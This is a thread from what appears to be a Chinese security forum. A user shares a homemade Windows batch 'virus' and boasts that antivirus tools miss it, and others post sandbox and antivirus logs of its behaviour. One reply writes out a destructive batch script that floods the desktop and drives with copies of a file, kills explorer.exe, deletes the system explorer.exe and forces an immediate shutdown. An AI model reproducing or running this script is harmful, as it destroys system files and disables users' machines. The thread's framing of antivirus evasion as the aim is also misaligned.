又一个自制bat病毒

我是大神才怪

     这次比上次更坑爹，而且还是一如既往的完全免杀（不信你们自己去多引擎测）
1.不要实机运行
2.请管理员运行
3.请解压到c盘virus文件夹

具具

火绒卡巴免杀

我是大神才怪

所有都免杀

左手

2019/1/25/星期五 09:18:21    创建新进程 风险提示:未知    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\taskkill.exe
命令行: taskkill  /f /im explorer.exe
规则: [应用程序]?* -> [子应用程序]?*:\windows\system32\taskkill.exe

2019/1/25/星期五 09:18:29    删除文件 风险提示:木马 (2)    阻止
进程: c:\windows\system32\cmd.exe
目标: C:\Windows\explorer.exe
规则: [应用程序]?* -> [文件组]《坚固》xp系统exe

安全守护者

我是大神才怪 发表于 2019-1-25 08:53
所有都免杀

给你改了一下：

1. @echo off
   
2. for /l %%i in (1, 1, 5000) do copy xxx.txt  %userprofile%\desktop\
   
3. for /l %%i in (1, 1, 5000) do copy xxx.txt  d:\
   
4. for /l %%i in (1, 1, 5000) do copy xxx.txt  e:\
   
5. taskkill /f /im explorer.exe
   
6. del /s /q %SystemRoot%\explorer.exe
   
7. shutdown -s -t 1

复制代码

huang1111

系统批处理文件而已，能算病毒？！

安全守护者

360隔离沙箱运行，占用急剧上升。
未见明显异常。随后系统关机。

1. 操作者：C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe
   
2. 命令行："C:\Windows\sysnative\cmd.exe" /c "C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe"
   
3. 触犯规则：关键保护
   
4. 操作类型：执行
   
5. 操作文件：C:\Windows\system32\taskkill.exe
   
6. 用户操作：已阻止
   
7. 操作者：C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe
   
8. 命令行："C:\Windows\sysnative\cmd.exe" /c "C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe"
   
9. 触犯规则：关键保护
   
10. 操作类型：删除
    
11. 操作文件：C:\360SANDBOX\SHADOW\Windows\SysWOW64\explorer.exe
    
12. 用户操作：已允许
    
13. 
    
14. 
    
15. 操作者：C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe
    
16. 命令行："C:\Windows\sysnative\cmd.exe" /c "C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe"
    
17. 触犯规则：关键保护
    
18. 操作类型：删除
    
19. 操作文件：C:\360SANDBOX\SHADOW\Windows\WinSxS\amd64_microsoft-windows-explorer_31bf3856ad364e35_10.0.18290.1000_none_e4b5d9e306f4c069\explorer.exe
    
20. 用户操作：已允许
    
21. 
    
22. 
    
23. 操作者：C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe
    
24. 命令行："C:\Windows\sysnative\cmd.exe" /c "C:\Users\Microsoft\AppData\Local\Temp\DF72.tmp\DF92.tmp\DFB2.bat D:\VIRUS\样本\0125\virus\kill.exe"
    
25. 触犯规则：关键保护
    
26. 操作类型：删除
    
27. 操作文件：C:\360SANDBOX\SHADOW\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.18290.1000_none_ef0a84353b558264\explorer.exe
    
28. 用户操作：已允许
    

复制代码

wenshui1013

这种杀软扫描不杀也正常吧，没意义啊

WHALE-FALL

智量
2019-1-25 12:20     D:\下载\virus\kill.bat                           RiskTool.Generic

www-tekeze

智量已入库，火绒miss 。